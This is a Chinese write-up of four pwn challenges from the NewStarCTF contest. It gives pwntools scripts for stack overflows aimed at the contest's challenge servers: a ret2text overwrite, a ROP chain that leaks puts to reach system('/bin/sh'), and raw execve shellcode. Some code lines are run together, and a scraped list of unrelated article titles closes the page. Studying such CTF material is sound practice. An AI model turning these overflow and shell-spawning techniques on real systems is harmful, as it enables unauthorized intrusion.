NewStarCTF 公开赛wp

  • ret2text
  • calc
  • ret2libc
  • ret2shellcode

ret2text


这里有个栈溢出,话不多说,上脚本。

from pwn import *
p=remote('node4.buuoj.cn',26128)
# p=process('./node4.buuoj.cn:25505')
payload=b'a'*0x20+p64(0xdeadbeef)+p64(0x00000400708)
p.sendlineafter('Welcome!May I have your name?\n',payload)
p.interactive()

calc


代码意思就是直接就是计算100次数据然后得到shell,你需要做的就是写个脚本计算这100次运算。

from pwn import *
context.log_level='debug'
p=remote('node4.buuoj.cn',25181)
# p=process('./pwn')
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
def dbg():gdb.attach(p)pause()
result=0
for i in range(100):p.recvuntil("What's the answer? ")num1=int(p.recvuntil(b' ',drop=True))char=p.recvuntil(b' ',drop=True)num2=int(p.recvuntil(b' ',drop=True))if char=='x':result=num1*num2elif char=='+':result=num1+num2elif char=='-':result=num1-num2elif char=='/':result=num1/num2# lg('result')# print num1# print(char) # print num2p.recvuntil('= what?\n',drop=True)p.sendline(str(result))# p.recvline()
# s=[num1 ,char ,num2]# result=exec('num1 char num2')
# # # print result
# p.sendline(result)
p.interactive()

ret2libc

栈溢出,但是没有后门函数,但是给了libc,于是就是ret2libc。

# from LibcSearcher import *
context.log_level='debug'
# p=process('./pwn')
p=remote('node4.buuoj.cn',28744)
def dbg():gdb.attach(p)pause()
elf=ELF('./pwn')
libc=ELF('./libc-2.31.so')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
mainaddr=0x00400698
pop_rdi=0x0000000000400753
ret=0x000000000040050e
payload=b'a'*0x20+p64(0xdeadbeef)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(mainaddr)
p.sendlineafter('Glad to meet you again!What u bring to me this time?',payload)
p.recvuntil('Ok.See you!\n')
putsaddr=u64(p.recv(6).ljust(8, "\x00"))
lg('putsaddr')
# dbg()
# libc = LibcSearcher("puts", putsaddr)
# offset=0x84420
libcbase = putsaddr - libc.symbols['puts']
system = libcbase + libc.symbols["system"]
bin_sh = next(libc.search(b"/bin/sh\x00"))+libcbase
lg('libcbase')
lg('system')
lg('bin_sh')
# dbg()
payload=b'a'*0x20+p64(0xdeadbeef)+p64(ret)+ p64(pop_rdi)+ p64(bin_sh)+p64(system)
# payload=b'a'*0x20+p64(0xdeadbeef)+p64(system)+p64(1)+ p64(bin_sh)
# payload=b'a'*0x20+p64(0xdeadbeef)+ p64(0xe3cf9+offset)p.sendlineafter('Glad to meet you again!What u bring to me this time?',payload)p.interactive()

ret2shellcode


又是栈溢出,顾题思议,ret2shellcode呗。

port imp
from pwn import *
context.log_level='debug'
p=remote('node4.buuoj.cn',29095)
# p=process('./pwn')
shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
p.sendlineafter('Hello my friend.Any gift for me?\n',shellcode)
payload=b'a'*0x30+p64(0)+p64(0x233000)
p.sendlineafter('Anything else?\n',payload)
p.interactive()

NewStarCTF 公开赛wp相关推荐

  1. 2022 七校联合NewStarCTF 公开赛赛道 WEEK3|MISC

    1.Whats HTTP 2.qsdz's girlfriend 3 3.WebShell! hint提示蚁剑,根据流量包大小排序,逐个打开看 4.Yesec no drumsticks 3 压缩包第 ...

  2. 七校联合NewStarCTF 公开赛赛道WEEK2 web wp

    也不知道是不是公开赛和内部赛是不是同一套题,week1的题挺简单的 这里小记一下week2的题目 如有侵权立刻删除 Word-For-You(2 Gen) 这题很简单就带过一下吧,报错注入就行 1'| ...

  3. NewStarCTF公开赛week2密码学题目wp

    文章目录 前言 一.unusual_base 1.分析 2.解题脚本 二.Affine 1.分析 2.解题脚本 三.robot 1.分析 2.解题脚本 四.ezPRNG 1.分析 2.解密脚本 五.e ...

  4. BUUCTF NewStarCTF 公开赛赛道Week3 Writeup

    文章目录 WEEK3 MISC Whats HTTP WebShell! qsdz's girlfriend 3 Yesec no drumsticks 3 混沌的图像 WEB BabySSTI_On ...

  5. 2022 七校联合NewStarCTF 公开赛赛道 WEEK2|MISC

    1.Yesec no drumsticks 2    2.Coldwinds's Desktop gaps,多更换几组参数,得到三张不同的图片 通过观察三张图片,猜出flag flag{Y0u_suc ...

  6. NewStarCTF 公开赛赛道 第二周学习记录

    额..又是我哦,这次难度对于我来说有点高,一共就做出来这几个,属实有点少,作为菜鸡的我来给大家讲讲我的思路.... CRYPTO 一个还没做出来,还正在研究 MISC Yesec no drumsti ...

  7. CTF之旅WEB篇(4)--NewStarCTF 公开赛IncludeOne详解

    前言: 在看这篇wp之前首先我们要了解文件包含,php伪协议读取,rot13编码,其具体含义即用法自行上网搜索,在文中不做进一步解释. 一.审题 扔给了我们一个道具?暂时还不知道这是要干嘛,所以我们进 ...

  8. NewStarCTF 公开赛赛道

    HTTP 跟着提示一步一步走. Head?Header! 同样是跟着提示. NotPHP <?php error_reporting(0); highlight_file(__FILE__); ...

  9. NewStarCTF 公开赛赛道 WEEK2 pwn 砍一刀

    64位的,保护机制 ida打开,简单的分析下程序流程,让你输入2次回车,一次666,再一次回车进入getcard函数,期间有 时间间隔 此函数就是输入19次回车后v1==999,进入if后会有随机数, ...

  10. NewStarCTF 公开赛赛道-WEEK1|REVERSE

    目录 Hello_Reverse Baby_Re Pyre EasyRe 艾克体悟题 Hello_Reverse 打开ida,shift+f12查看字符串就可以看到flag: 这段数据很可疑: c=[ ...

最新文章

  1. 包含锚点平滑滚动效果/解决锚点链接碰到固定定位问题/导航选中背景变色/固顶/返回顶部效果全...
  2. feifeicms 4.0 几处任意文件删除
  3. 使用druid连接池的超时回收机制排查连接泄露问题
  4. 【组合数学】排列组合 ( 排列组合内容概要 | 选取问题 | 集合排列 | 集合组合 )
  5. STM32 基础系列教程 15 - SPI
  6. java程序不能编译_救命-JAVA程序不能编译!
  7. pandas 知识点补充:绘图plot
  8. [Luogu] P1939 【模板】矩阵加速(数列)
  9. 【Tyvj1185】【codevs1296】【BZOJ1588】营业额统计,Splay练习
  10. linux 串口命令
  11. [转]老婆还是自己好
  12. GDAL和GeoPandas的安装
  13. STM32 姿态传感器mpu6050的使用
  14. 周杰伦是怎么凌空闪现今年春晚的?
  15. 用计算机如何算针入度指数,沥青针入度指数怎么计算?需要计算公式,最好说的详细一点!...
  16. nginx根据post请求体内容转发
  17. 苹果内购那些事儿(二)
  18. 每天睡前按摩腹部,坚持一个月有什么好处?
  19. python 怎么建立文件夹_如何用PYTHON新建文件夹
  20. 1134:猴子与香蕉 dp

热门文章

  1. pdf文档页码怎么添加
  2. Oracle RAC Failover 说明
  3. 智能剪刀——交互式图像分割
  4. ibm cloud怎么使用_使用IBM Cloud中的业务规则服务构建酒店预订应用程序
  5. 云原生中为什么需要API网关?
  6. Photoshop软件介绍
  7. 一个小程序走完诉讼全程,腾讯云加速推动“智慧法院”方案落地
  8. Android手机怎么开启原生虚拟按键-以小米手机为例,实现全面屏手势
  9. Android AppWidget控制手机上网APN接入点
  10. 【1024个人爆款文章】Android 安卓原生UI实现游戏《俄罗斯方块》,算法太多,把我写崩溃了,附源码